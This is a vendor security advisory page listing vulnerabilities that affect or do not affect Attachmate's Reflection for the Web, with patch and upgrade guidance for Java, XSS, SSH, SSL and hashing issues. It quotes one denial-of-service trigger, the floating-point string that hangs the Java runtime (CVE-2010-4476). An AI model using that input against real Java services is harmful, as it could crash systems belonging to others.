
Technical Notes |
|
This technical note describes security issues related to the Reflection for the Web products listed in the Applies To section. If you rely on the security features of these products, you should consult this technical note on a regular basis for any updated information regarding these features.
The following security alerts and advisories may affect your product installation, or the security of your operating system or network environment. We recommend that you review these alerts and advisories.
Note: This information is non-inclusiveit does not attempt to address all security issues that may affect your system.
IMPORTANT REMINDER: The security for all of the Attachmate products using the Attachmate security features depends upon the security of the operating system, host, and network environment. We strongly recommend that you evaluate and implement all relevant security service packs, updates, and patches recommended by your operating system, host, and network manufacturers. For more information, see Technical Note 2200.
| Alert |
Vulnerability Summary for CVE-2013-0422 |
| Date Posted |
January 2013 |
| Summary |
Oracle Java 7 Update 10 or earlier allows remote attackers to execute arbitrary code as exploited "in the wild" and demonstrated by exploit tools such as Blackhole and Nuclear Pack. Note: Oracle states that Java 6 is not affected. According to Oracle, to be successfully exploited, an unsuspecting user running an affected release in a browser needs to visit a malicious web page that leverages these vulnerabilities. Successful exploits can impact the availability, integrity, and confidentiality of the user's system. These vulnerabilities are not applicable to Java running on servers or within applications. |
| Product Status |
Reflection for the Web is not subject to this vulnerability, however user and administrator web pages must be accessed from a browser with the Java plug-in enabled. Also, if you've configured the non-default option of having sessions start using Java Web Start (JNLP), user browsers must have JNLP enabled to launch these sessions. It is the Java plug-in and Web Start that can be exploited, not Reflection for the Web. To minimize the risk described in this vulnerability on these systems, you should refer to the latest information provided by Oracle and install a version of Java that addresses this vulnerability. If you have upgraded to Java 7 Update 11, see Technical Note 2655 for information about the prompt, "Do you want to run this application?" |
| Additional Information |
For details, see the National Vulnerability Database at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422 and Oracle's site at http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html. |
| Alert |
Multiple Oracle JRE Vulnerabilities in Java 6 Update 27 or earlier |
| Date Posted |
December 2011 |
| Summary |
Multiple security issues have been addressed in Oracle Java 6 Update 29. |
| Product Status |
A hotfix has been issued for Reflection for the Web 2011 R1, updating the version of Java included in the automated installers to Java 6 Update 29. The hotfix is Reflection for the Web 2011 R1 Build 11.0[.nnn].527. To obtain a hotfix, contact Attachmate Technical Support, http://support.attachmate.com/contact/. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in that is installed on their machine. To resolve the issues addressed by this Oracle Java security update, you should update the JRE on user machines to Java 6 Update 29 or higher. |
| Additional Information |
For details about the vulnerabilities fixed by Oracle in Java 6 Update 29, see the Oracle web site at http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html. |
| Alert |
Multiple Oracle JRE Vulnerabilities in Java 6 Update 25 or earlier |
| Date Posted |
December 2011 |
| Summary |
Multiple security issues have been addressed in Oracle Java 6 Update 26. |
| Product Status |
A hotfix has been issued for Reflection for the Web 2011 R1, updating the version of Java included in the automated installers to Java 6 Update 26. The hotfix is Reflection for the Web 2011 R1 Build 11.0[.nnn].500. A hotfix has also been issued for Reflection for the Web 2008 R3, updating the version of Java included in the automated installers to Java 6 Update 26. The hotfix is Reflection for the Web 2008 R3 Build 10.2[.nnn].527. To obtain a hotfix, contact Attachmate Technical Support, http://support.attachmate.com/contact/. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in that is installed on their machine. To resolve the issues addressed by this Oracle Java security update, you should update the JRE on user machines to Java 6 Update 26 or higher. |
| Additional Information |
For details about the vulnerabilities fixed by Oracle in Java 6 Update 26, see the Oracle web site at http://www.oracle.com/technetwork/topics/security/javacpujune2011-313339.html. |
| Alert |
Floating Point Number Vulnerability CVE-2010-4476 |
| Date Posted |
November 2011 |
| Summary |
Oracle Security Alert: "This Security Alert addresses security issue CVE-2010-4476 (Java Runtime Environment hangs when converting "2.2250738585072012e-308" to a binary floating-point number), which is a vulnerability in the Java Runtime Environment component of the Oracle Java SE and Java for Business products. This vulnerability allows unauthenticated network attacks (that is, it may be exploited over a network without the need for a username and password). Successful attack of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete Denial of Service) of the Java Runtime Environment. Java based application and web servers are especially at risk from this vulnerability." |
| Product Status |
Reflection for the Web 2008 R3 (10.2[.nnn].526 or earlier Reflection for the Web 2008 versions) includes a Java version that is vulnerable to this issue. To resolve the issue, upgrade to Reflection for the Web 2008 R3 Build 527 (10.2[.nnn].527 or higher) or Reflection for the Web 2011. If you installed Reflection for the Web manually, then you should upgrade the Java version to 6 Update 24 or higher. Users running Reflection for the Web clients use the Java Runtime Environment and browser plug-in that is installed on their machine. To resolve the issue, users must update the JRE on their machine to Java 6 Update 24 or higher. |
| Additional Information |
For details see the Oracle web site at http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html, and the National Vulnerability Database web site at http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4476. |
| Alert |
Cross-site Scripting Vulnerability |
| Date Posted |
October 2010 |
| Summary |
Certain versions of Reflection for the Web (Reflection for the Web 2008 version R2 (builds 10.1[.nnn].569 and earlier), Reflection for the Web 2008 R1, Reflection for the Web 9.6 and earlier) have a non-persistent cross-site scripting vulnerability, whereby malformed input can be reflected back to the user and executed as script within the user’s web browser and within the security context of the user. The attacker would need to induce the user to voluntarily interact with the attack mechanism. The potential impact would depend on the configuration of the victim’s browser and system. |
| Product Status |
Reflection for the Web 2008 R2 (builds 10.1[.nnn].570 or higher) or higher versions are not affected. Reflection for the Web 2008 version R2 (builds 10.1[.nnn],569 and earlier), Reflection for the Web 2008 R1, and Reflection for the Web 9.6 and earlier are affected. To determine which version of Reflection for the Web you are running, log in to the Administrative WebStation, click Resources, and then click About Reflection for the Web. We recommend upgrading to the current version. |
| Alert |
Vulnerability Advisory CPNI-957037 |
| Date Posted |
October 2010 - Modified October 2008 |
| Summary |
A design flaw in the SSH protocol use of block ciphers in cipher block chaining mode could allow an attacker to recover up to four bytes of plaintext. Although the severity of the attack is considered high, the likelihood of a successful attack is considered low and results in terminating the user’s SSH connection. |
| Product Status |
Beginning in Reflection for the Web 2008 R3, counter mode cipher support is available. For more information about how this vulnerability affects Attachmate products, see Technical Note 2398. |
| Additional Information |
For details, see the US-CERT web site at http://www.kb.cert.org/vuls/id/958563. |
| Alert |
US-CERT Vulnerability Note VU #845620 |
| Date Posted |
September 5, 2006 |
| Summary |
Multiple RSA implementations fail to properly handle signatures. |
| Product Status |
Attachmate has determined that the usage of the RSA digital signature algorithm in Reflection for the Web is not subject to this vulnerability. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/845620. |
| Alert |
US-CERT Vulnerability Note VU#680620 |
| Date Posted |
July 14, 2005 |
| Summary |
Buffer overflow vulnerability in versions 1.2.1 and 1.2.2 of the zlib data compression library inflate() routine. |
| Product Status |
Reflection for the Web does not use zlib and is not subject to this vulnerability. |
| Additional Information |
For details, see the CERT web site at http://www.kb.cert.org/vuls/id/680620. |
| Alert |
Multiple iDEFENSE Security Advisories/US-CERT Vulnerability Note VU#800829 |
| Date Posted |
July 7, 2005 |
| Summary |
Multiple vendor telnet client information disclosure vulnerabilities. |
| Product Status |
Reflection for the Web Telnet clients are not vulnerable to these issues as they return limited terminal information in response to the NEW_ENVIRONMENT command and use dynamically-sized buffering. |
| Additional Information |
For details about these vulnerabilities, see the iDefense or US-Cert articles listed below. iDefense: http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities http://www.idefense.com/application/poi/display?id=220&type=vulnerabilities http://www.idefense.com/application/poi/display?id=221&type=vulnerabilities US-CERT: http://www.kb.cert.org/vuls/id/800829 |
| Alert |
Announcement of Successful Cryptanalytic Attack on SHA-1 |
| Summary |
Three Chinese cryptanalysts from Shandong University have recently documented a successful cryptanalytic attack on the SHA-1 algorithm. |
| Product Status |
Reflection products primarily use SHA-1 to create HMACs (Keyed Hashing for Message Authentication), for verification of message integrity. According to Schneier, because hash collisions are not a prominent concern, this use of SHA-1 is not affected by the cryptanalytic attack. (For further details, read the blog posting at http://www.schneier.com/blog/archives/2005/02/sha1_broken.html.) In next several versions of products that use the SHA-1 algorithm, all vendorsincluding Attachmate, will likely move to phase out the use of SHA-1 hashes for use in digital signatures and add support for SHA-256 and other stronger hashing algorithms. |
| Additional Information |
Bruce Schneier, the author of "Applied Cryptography," discusses this announcement on his blog, Schneier on Security. For commentary on this topic, see Mr. Schneier's blog at http://www.schneier.com/blog/archives/2005/02/cryptanalysis_o.html. |
| Alert |
CERT Advisory CA-2003-26 |
| Summary |
Multiple Vulnerabilities in SSL/TLS Implementations. |
| Product Status |
Attachmate has inspected Reflection for the Web and determined that it is not vulnerable to the issues addressed in this alert. |
| Additional Information |
For details, see http://www.cert.org/advisories/CA-2003-26.html. |
| Alert |
CERT Advisory CA-2002-36 |
| Summary |
Vulnerabilities in SSH2 Implementations from Multiple Vendors. |
| Product Status |
Attachmate has tested Reflection for the Web with the provided test suite and found that it is not vulnerable to the SSH2 connection initialization, key exchange, and negotiation phase attacks. |
| Additional Information |
For details, see http://www.cert.org/advisories/CA-2002-36.html. |
Notice: This technical note is updated from time to time and is provided for informational purposes only. Attachmate makes no representation or warranty that the functions contained in our software products will meet your requirements or that the operation of our software products will be interruption or error free. Attachmate EXPRESSLY DISCLAIMS ALL WARRANTIES REGARDING OUR SOFTWARE INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.